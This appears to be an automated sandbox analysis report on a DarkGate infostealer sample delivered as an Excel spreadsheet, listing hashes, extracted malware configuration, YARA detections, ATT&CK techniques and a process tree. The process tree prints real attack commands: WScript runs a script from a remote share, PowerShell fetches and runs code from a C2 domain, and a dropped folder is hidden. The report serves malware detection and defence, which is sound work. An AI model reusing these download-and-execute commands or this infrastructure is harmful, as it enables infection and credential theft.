darkgate | c0bdda3b38fb62f8de43d24640c8db5f0e883836d704041dd1f7c338f2709d02

Analysis

max time kernel
598s
max time network
587s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
10-04-2024 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4_10_AC-3010.xlsx
Size

51KB
MD5

7c265753eddf8443ad04c994b063f622
SHA1

a770cd22f58c78979d689f1db45ec05973e2d815
SHA256

c0bdda3b38fb62f8de43d24640c8db5f0e883836d704041dd1f7c338f2709d02
SHA512

7aacf817f45072c20e27f544e1f9464a3db0849a7797fe9a247455c9301c16af3077b45729da03b731c2cc1a75c7d29717abc8e0515511336067da829167a10e
SSDEEP

1536:4s1eZDHgM8v42wkYq84lKL7IAnA4xCQH140sXe:V1eZcMetF8T7IAA4xprsu

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

wassonite.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
jdfEdKYT
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 8 IoCs

resource	yara_rule
behavioral1/memory/3436-254-0x00000000030D0000-0x0000000003144000-memory.dmp	family_darkgate_v6
behavioral1/memory/3436-255-0x00000000030D0000-0x0000000003144000-memory.dmp	family_darkgate_v6
behavioral1/memory/964-323-0x00000000045D0000-0x0000000004644000-memory.dmp	family_darkgate_v6
behavioral1/memory/964-325-0x00000000045D0000-0x0000000004644000-memory.dmp	family_darkgate_v6
behavioral1/memory/1536-382-0x0000000004560000-0x00000000045D4000-memory.dmp	family_darkgate_v6
behavioral1/memory/1536-384-0x0000000004560000-0x00000000045D4000-memory.dmp	family_darkgate_v6
behavioral1/memory/796-443-0x0000000002CF0000-0x0000000002D64000-memory.dmp	family_darkgate_v6
behavioral1/memory/796-444-0x0000000002CF0000-0x0000000002D64000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2940	4532	WScript.exe	71

Blocklisted process makes network request 16 IoCs

flow	pid	Process
22	2720	powershell.exe
24	2720	powershell.exe
25	2720	powershell.exe
26	2720	powershell.exe
42	3900	powershell.exe
43	3900	powershell.exe
44	3900	powershell.exe
45	3900	powershell.exe
46	4588	powershell.exe
47	4588	powershell.exe
48	4588	powershell.exe
49	4588	powershell.exe
54	4624	powershell.exe
55	4624	powershell.exe
56	4624	powershell.exe
57	4624	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
3436	AutoHotkey.exe
964	AutoHotkey.exe
1536	AutoHotkey.exe
796	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 11 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4532	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2720	powershell.exe
2720	powershell.exe
2720	powershell.exe
3436	AutoHotkey.exe
3436	AutoHotkey.exe
3900	powershell.exe
3900	powershell.exe
3900	powershell.exe
964	AutoHotkey.exe
964	AutoHotkey.exe
4588	powershell.exe
4588	powershell.exe
4588	powershell.exe
1536	AutoHotkey.exe
1536	AutoHotkey.exe
4624	powershell.exe
4624	powershell.exe
4624	powershell.exe
796	AutoHotkey.exe
796	AutoHotkey.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	4588	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4532	EXCEL.EXE
4532	EXCEL.EXE

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE
4532	EXCEL.EXE

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 4532 wrote to memory of 2940	4532	EXCEL.EXE	74
PID 4532 wrote to memory of 2940	4532	EXCEL.EXE	74
PID 2940 wrote to memory of 2720	2940	WScript.exe	75
PID 2940 wrote to memory of 2720	2940	WScript.exe	75
PID 2720 wrote to memory of 3436	2720	powershell.exe	77
PID 2720 wrote to memory of 3436	2720	powershell.exe	77
PID 2720 wrote to memory of 3436	2720	powershell.exe	77
PID 2720 wrote to memory of 1596	2720	powershell.exe	78
PID 2720 wrote to memory of 1596	2720	powershell.exe	78
PID 796 wrote to memory of 3900	796	WScript.exe	83
PID 796 wrote to memory of 3900	796	WScript.exe	83
PID 3900 wrote to memory of 964	3900	powershell.exe	85
PID 3900 wrote to memory of 964	3900	powershell.exe	85
PID 3900 wrote to memory of 964	3900	powershell.exe	85
PID 3900 wrote to memory of 3152	3900	powershell.exe	86
PID 3900 wrote to memory of 3152	3900	powershell.exe	86
PID 1132 wrote to memory of 4588	1132	WScript.exe	89
PID 1132 wrote to memory of 4588	1132	WScript.exe	89
PID 4588 wrote to memory of 1536	4588	powershell.exe	91
PID 4588 wrote to memory of 1536	4588	powershell.exe	91
PID 4588 wrote to memory of 1536	4588	powershell.exe	91
PID 4588 wrote to memory of 1456	4588	powershell.exe	92
PID 4588 wrote to memory of 1456	4588	powershell.exe	92
PID 2260 wrote to memory of 4624	2260	WScript.exe	97
PID 2260 wrote to memory of 4624	2260	WScript.exe	97
PID 4624 wrote to memory of 796	4624	powershell.exe	99
PID 4624 wrote to memory of 796	4624	powershell.exe	99
PID 4624 wrote to memory of 796	4624	powershell.exe	99
PID 4624 wrote to memory of 1756	4624	powershell.exe	100
PID 4624 wrote to memory of 1756	4624	powershell.exe	100

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3152	attrib.exe
1456	attrib.exe
1756	attrib.exe
1596	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4_10_AC-3010.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4532
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.JS"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:2940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\ciie\AutoHotkey.exe
      "C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3436
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/ciie/
      4⤵
      Views/modifies file attributes
      PID:1596

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s fdPHost
1⤵
PID:4500

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3900
- - C:\ciie\AutoHotkey.exe
    "C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:964
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/ciie/
    3⤵
    - Views/modifies file attributes
    PID:3152

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1336

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:1132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\ciie\AutoHotkey.exe
    "C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1536
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/ciie/
    3⤵
    - Views/modifies file attributes
    PID:1456

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "\\5.180.24.155\azure\EXCEL_DOCUMENT_OPEN.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri wassonite.com/yrqnsfla)
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4624
- - C:\ciie\AutoHotkey.exe
    "C:\ciie\AutoHotkey.exe" C:/ciie/script.ahk
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:796
- - C:\Windows\system32\attrib.exe
    "C:\Windows\system32\attrib.exe" +h C:/ciie/
    3⤵
    - Views/modifies file attributes
    PID:1756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
2c64aa22536612920da5641216f191f8

SHA1
debe1b1206f3f61f39df0a0926f939c1b912ef82

SHA256
5e94bb78213ae5e7c4c84af6f4502a9c3b37c6eac26ca846fe474349149e2b22

SHA512
7f01f5c2bd13faecd1992fcad6fccf04dd67946687881e33e502fea33bdcf70da7042867ec216fc7c83bd43d6b17ccf16e9a72f336c1977732444afd4920d2b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
48a092f761309162570e3d80876262c7

SHA1
58b1b3249349c026959f002abc937148ceeb6a7d

SHA256
f93d925460b45df058b528349080b463f70cca8ab66169bfd0eab43a99e1c282

SHA512
640b24ac6a9e912fa59d019b555306830cce9223829a368790eaf63ef5ac316a4a99fc8cd9df44cdc1e22e564fd97a922f7f0b5d8109d1d9683d6a33f121e955

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
14193d1feddf6a13e4f4a181c300272d

SHA1
ec7e4fb4721f3181bd98b5a25be090fd44571ec5

SHA256
f36abe571d6703ee2b71bd575f41bec16bf207ea9ac999c288fb9b81f4e2e0bf

SHA512
03ff678f06b971545c34f7b362bb2952f21b5d6ae0329465d006c40807a0965a74336f2cdda0f3983a5e4a49237dbab094bd750c726b4041a21619f18e10ee5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
06c99963d244116928dbb26336c13e42

SHA1
de38182b9e203347bcf10844bc9cd78e3fbb4b4c

SHA256
f5eb8a80b94188a90da8b4211aa09bd6206ba844c678e736d9c3ab93f3d0ecfb

SHA512
f454ffadbaeb798f3d646eb40a1534b15b4c5b471635f86176eb082ca36512e3034258cb7261221d343f92f4f41a2ab9bb41465c16681a97a694d6e4a2a91c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpfyazmc.vsn.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\aHhbdFb

Filesize
32B

MD5
d59c7d5fed873c48053850920ccdd442

SHA1
a80343cb8bacb5da2b42de59456c15fc16d17d37

SHA256
6732db16e43d0b606f9e275dfd8a37ad1aac7df27cdcf4181a5f0c3a5e294ebd

SHA512
fbe8f3c0580298a06ef40212fad7a0f0592163100bf2ddac039a6deabb017910d0c5e1ebd1c36e022f694b458d78f571b5cd1401900c1b2a607ac08c11d74f17

Download Submit
C:\ciie\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\ciie\script.ahk

Filesize
441B

MD5
a2f4ba569825d00dbbb62fd64104e0e3

SHA1
45687aac5b0031d2063c466fa3fee6f813e92441

SHA256
8fca9dd75bac6406d6acd04ad98ee58c31e112fc3352199ebdc45f0347601791

SHA512
5a7825f6d47a7f5f7c198a2b34a8bd08a422b22753239b8ec6307d6e22c8c544ae54765f9954706f3e99976c28ad6085d78d88c92a650ce86e88f9751c486cc3

Download Submit
C:\ciie\test.txt

Filesize
924KB

MD5
dcb6148e6a4d5c89ab44a23b4edebeeb

SHA1
542839b03a18f57efe10dc318d8947a31a3ee61a

SHA256
0e64aabd9ea8afb2f01925c2eb06bf2bb57d1b09e7971e653a7256c56775a634

SHA512
ac7359c8b85eeb86ae742c2e8ad2788314248dd26b5f37889ea9660282538716db7fca96b48a287b087c0ca669c1c0e8ce6b19278268a53eddd99dc1b24ac85d

Download Submit
C:\hfabceh\egfkdda

Filesize
1KB

MD5
14239923c5a76ba044e15b90a22eaad1

SHA1
113ec554dc3f16e6cd27eab90b64632c78740e6e

SHA256
23638ad327816951151b870fa572a8cb7b009926d5746b2206b17b1e03151cc0

SHA512
f1eaaf9d56863e067eda231e299bed48660e609ba8cad84f8e6087920f47c2add22241145ef1b5ef27c92128756173df0d2d9a8ef474d20916a83733b2327a04

Download Submit
memory/796-443-0x0000000002CF0000-0x0000000002D64000-memory.dmp

Filesize
464KB

Download
memory/796-444-0x0000000002CF0000-0x0000000002D64000-memory.dmp

Filesize
464KB

Download
memory/964-325-0x00000000045D0000-0x0000000004644000-memory.dmp

Filesize
464KB

Download
memory/964-323-0x00000000045D0000-0x0000000004644000-memory.dmp

Filesize
464KB

Download
memory/1536-384-0x0000000004560000-0x00000000045D4000-memory.dmp

Filesize
464KB

Download
memory/1536-382-0x0000000004560000-0x00000000045D4000-memory.dmp

Filesize
464KB

Download
memory/2720-191-0x0000015B7A870000-0x0000015B7A892000-memory.dmp

Filesize
136KB

Download
memory/2720-192-0x00007FFFBB5A0000-0x00007FFFBBF8C000-memory.dmp

Filesize
9.9MB

Download
memory/2720-198-0x0000015B7A920000-0x0000015B7A996000-memory.dmp

Filesize
472KB

Download
memory/2720-196-0x0000015B625A0000-0x0000015B625B0000-memory.dmp

Filesize
64KB

Download
memory/2720-252-0x00007FFFBB5A0000-0x00007FFFBBF8C000-memory.dmp

Filesize
9.9MB

Download
memory/2720-215-0x0000015B625A0000-0x0000015B625B0000-memory.dmp

Filesize
64KB

Download
memory/2720-193-0x0000015B625A0000-0x0000015B625B0000-memory.dmp

Filesize
64KB

Download
memory/2720-220-0x0000015B7B110000-0x0000015B7B2D2000-memory.dmp

Filesize
1.8MB

Download
memory/3436-254-0x00000000030D0000-0x0000000003144000-memory.dmp

Filesize
464KB

Download
memory/3436-255-0x00000000030D0000-0x0000000003144000-memory.dmp

Filesize
464KB

Download
memory/3900-271-0x000001B060680000-0x000001B060690000-memory.dmp

Filesize
64KB

Download
memory/3900-290-0x000001B060680000-0x000001B060690000-memory.dmp

Filesize
64KB

Download
memory/3900-321-0x00007FFFBB5A0000-0x00007FFFBBF8C000-memory.dmp

Filesize
9.9MB

Download
memory/3900-272-0x000001B060680000-0x000001B060690000-memory.dmp

Filesize
64KB

Download
memory/3900-269-0x00007FFFBB5A0000-0x00007FFFBBF8C000-memory.dmp

Filesize
9.9MB

Download
memory/4532-19-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-12-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-214-0x00007FFFDDAC0000-0x00007FFFDDB6E000-memory.dmp

Filesize
696KB

Download
memory/4532-194-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-32-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-29-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-27-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-25-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-23-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-22-0x00007FFFDDAC0000-0x00007FFFDDB6E000-memory.dmp

Filesize
696KB

Download
memory/4532-21-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-20-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-0-0x00007FFF9FF20000-0x00007FFF9FF30000-memory.dmp

Filesize
64KB

Download
memory/4532-18-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-17-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-16-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-14-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-15-0x00007FFF9CBB0000-0x00007FFF9CBC0000-memory.dmp

Filesize
64KB

Download
memory/4532-13-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-213-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-10-0x00007FFF9CBB0000-0x00007FFF9CBC0000-memory.dmp

Filesize
64KB

Download
memory/4532-11-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-2-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-1-0x00007FFF9FF20000-0x00007FFF9FF30000-memory.dmp

Filesize
64KB

Download
memory/4532-4-0x00007FFF9FF20000-0x00007FFF9FF30000-memory.dmp

Filesize
64KB

Download
memory/4532-9-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-5-0x00007FFF9FF20000-0x00007FFF9FF30000-memory.dmp

Filesize
64KB

Download
memory/4532-3-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4532-7-0x00007FFFDFE90000-0x00007FFFE006B000-memory.dmp

Filesize
1.9MB

Download
memory/4588-381-0x00007FFFB9C90000-0x00007FFFBA67C000-memory.dmp

Filesize
9.9MB

Download
memory/4588-350-0x00000213E4490000-0x00000213E44A0000-memory.dmp

Filesize
64KB

Download
memory/4588-331-0x00000213E4490000-0x00000213E44A0000-memory.dmp

Filesize
64KB

Download
memory/4588-332-0x00000213E4490000-0x00000213E44A0000-memory.dmp

Filesize
64KB

Download
memory/4588-330-0x00007FFFB9C90000-0x00007FFFBA67C000-memory.dmp

Filesize
9.9MB

Download
memory/4624-390-0x00007FFFB9C90000-0x00007FFFBA67C000-memory.dmp

Filesize
9.9MB

Download
memory/4624-391-0x0000025EF71B0000-0x0000025EF71C0000-memory.dmp

Filesize
64KB

Download
memory/4624-393-0x0000025EF71B0000-0x0000025EF71C0000-memory.dmp

Filesize
64KB

Download
memory/4624-411-0x0000025EF71B0000-0x0000025EF71C0000-memory.dmp

Filesize
64KB

Download
memory/4624-442-0x00007FFFB9C90000-0x00007FFFBA67C000-memory.dmp

Filesize
9.9MB

Download